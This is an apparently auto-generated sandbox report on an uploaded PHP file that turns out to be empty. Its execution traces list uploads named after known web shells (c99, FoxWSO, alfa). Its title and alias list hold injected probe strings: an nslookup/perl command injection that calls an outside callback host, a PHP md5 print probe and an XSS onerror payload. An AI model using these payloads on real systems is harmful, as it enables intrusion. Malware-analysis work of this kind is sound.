PHP Malware Analysis
;(nslookup hitqbrkmvcrvz33734.bxss.me||perl -e , '.print(md5(31337)).', '+'A'.concat(70-3).concat(22*4).concat(107).concat(83).concat(106).concat(72)+(require'socket'Socket.gethostbyname('hitoa'+'empc, @@m0eBI, 1<aVadSCk<, a.pl, AA00.PhP, abc<img src="">abc, alfav4.1-tesla.php, alpha.php5, bxss.me, c99.php, dbs.php, dikkepipe.txt, file.txt, FoxWSO v2.23.php, gen<img src=1 onerror=alert(document.domain)>gen, gggg.php, gggg.php.suspected, iki.tc, index.php, lol.php, mini.php, shelldetect.py, ss.php, test.php, test.txt, up.txt, web.xml, whm.PhP5, xxxx.jpg.php
md5: d41d8cd98f00b204e9800998ecf8427e
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Deobfuscated PHP code
<?phpExecution traces
data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676240207.9034.xtdata/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676240390.6807.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 20:17:13.801240] 1 0 1 0.000183 393512 1 3 0 0.000218 392952 {main} 1 /var/www/html/uploads/AA00.PhP 0 0 1 3 1 0.000232 392952 0.000258 314224 TRACE END [2023-02-12 20:17:13.801351]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676242242.5354.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 20:20:16.578545] 1 0 1 0.000217 393512 1 3 0 0.000250 392952 {main} 1 /var/www/html/uploads/whm.PhP5 0 0 1 3 1 0.000264 392952 0.000287 314224 TRACE END [2023-02-12 20:20:16.578721]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676242474.5792.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 20:51:08.433262] 1 0 1 0.000174 393576 1 3 0 0.000207 393024 {main} 1 /var/www/html/uploads/FoxWSO v2.23.php 0 0 1 3 1 0.000221 393024 0.000245 314264 TRACE END [2023-02-12 20:51:08.433369]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676243095.3859.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 20:55:00.477017] 1 0 1 0.000178 393528 1 3 0 0.000217 392976 {main} 1 /var/www/html/uploads/shelldetect.py 0 0 1 3 1 0.000234 392976 0.000262 314240 TRACE END [2023-02-12 20:55:00.477138]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676243824.5548.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 21:05:21.283698] 1 0 1 0.000156 393528 1 3 0 0.000191 392976 {main} 1 /var/www/html/uploads/alpha.php5 0 0 1 3 1 0.000205 392976 0.000227 314240 TRACE END [2023-02-12 21:05:21.283818]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676245317.9867.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 21:17:30.452616] 1 0 1 0.000159 393512 1 3 0 0.000190 392952 {main} 1 /var/www/html/uploads/c99.php 0 0 1 3 1 0.000203 392952 0.000227 314224 TRACE END [2023-02-12 21:17:30.452717]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676250742.9844.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 21:42:23.884570] 1 0 1 0.000165 393512 1 3 0 0.000197 392952 {main} 1 /var/www/html/uploads/index.php 0 0 1 3 1 0.000211 392952 0.000235 314224 TRACE END [2023-02-12 21:42:23.884674]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676252076.1024.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 23:12:48.882190] 1 0 1 0.000134 393512 1 3 0 0.000166 392952 {main} 1 /var/www/html/uploads/test.php 0 0 1 3 1 0.000180 392952 0.000203 314224 TRACE END [2023-02-12 23:12:48.882288]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676252586.1974.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 23:35:02.000241] 1 0 1 0.000155 393608 1 3 0 0.000186 393072 {main} 1 /var/www/html/uploads/gggg.php.suspected 0 0 1 3 1 0.000201 393072 0.000224 314296 TRACE END [2023-02-12 23:35:02.000342]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676254065.0824.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 23:43:32.095258] 1 0 1 0.000133 393512 1 3 0 0.000163 392952 {main} 1 /var/www/html/uploads/lol.php 0 0 1 3 1 0.000177 392952 0.000199 314224 TRACE END [2023-02-12 23:43:32.095352]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676254579.4935.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 00:08:10.980199] 1 0 1 0.000204 393528 1 3 0 0.000238 392976 {main} 1 /var/www/html/uploads/xxxx.jpg.php 0 0 1 3 1 0.000252 392976 0.000275 314240 TRACE END [2023-02-13 00:08:10.980363]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676256672.651.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 00:16:45.391285] 1 0 1 0.000175 393608 1 3 0 0.000206 393072 {main} 1 /var/www/html/uploads/'.print(md5(31337)).' 0 0 1 3 1 0.000222 393072 0.000247 314296 TRACE END [2023-02-13 00:16:45.391391]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676256688.2095.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 00:51:38.548875] 1 0 1 0.000289 393464 1 3 0 0.000334 392904 {main} 1 /var/www/html/uploads/ss.php 0 0 1 3 1 0.000352 392904 0.000383 314200 TRACE END [2023-02-13 00:51:38.549103]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676257126.5368.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 00:51:54.107308] 1 0 1 0.000166 393512 1 3 0 0.000198 392952 {main} 1 /var/www/html/uploads/mini.php 0 0 1 3 1 0.000213 392952 0.000237 314224 TRACE END [2023-02-13 00:51:54.107415]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676257442.2261.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 00:59:12.434636] 1 0 1 0.000142 393512 1 3 0 0.000172 392952 {main} 1 /var/www/html/uploads/gggg.php 0 0 1 3 1 0.000186 392952 0.000208 314224 TRACE END [2023-02-13 00:59:12.434733]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676257652.2519.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 01:04:28.123929] 1 0 1 0.000233 393464 1 3 0 0.000271 392904 {main} 1 /var/www/html/uploads/a.pl 0 0 1 3 1 0.000289 392904 0.000317 314200 TRACE END [2023-02-13 01:04:28.124049]data/traces/d41d8cd98f00b204e9800998ecf8427e_trace-1676261458.0998.xtVersion: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 01:07:58.149711] 1 0 1 0.000187 393512 1 3 0 0.000221 392952 {main} 1 /var/www/html/uploads/dbs.php 0 0 1 3 1 0.000235 392952 0.000261 314224 TRACE END [2023-02-13 01:07:58.149823]Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 02:11:23.997658] 1 0 1 0.000138 393608 1 3 0 0.000168 393072 {main} 1 /var/www/html/uploads/alfav4.1-tesla.php 0 0 1 3 1 0.000184 393072 0.000206 314296 TRACE END [2023-02-13 02:11:23.997754]Generated HTML code
<html><head></head><body></body></html>Original PHP code
